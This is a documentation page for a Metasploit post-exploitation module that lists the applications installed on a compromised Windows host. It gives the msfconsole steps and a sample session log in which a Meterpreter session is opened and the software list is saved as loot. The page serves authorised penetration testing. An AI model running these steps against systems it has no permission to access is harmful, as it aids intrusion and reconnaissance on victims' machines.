## Vulnerable Application This module will enumerate all installed applications on a Windows system. ## Verification Steps 1. Start msfconsole 2. Get meterpreter session 3. Do: ```use post/windows/gather/enum_applications``` 4. Do: ```set SESSION ``` 5. Do: ```run``` ## Options **SESSION** The session to run this module on. ## Scenarios ### Windows 7 (6.1 Build 7601, Service Pack 1). ``` [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.4:49178) at 2019-12-10 14:18:44 -0700 msf exploit(windows/smb/group_policy_startup) > use post/windows/gather/enum_applications msf post(windows/gather/enum_applications) > set SESSION 1 SESSION => 1 msf post(windows/gather/enum_applications) > run [*] Enumerating applications installed on PC Installed Applications ====================== Name Version ---- ------- PuTTY release 0.73 0.73.0.0 [+] Results stored in: /root/.msf4/loot/20191211092812_default_192.168.1.4_host.application_951840.txt [*] Post module execution completed ```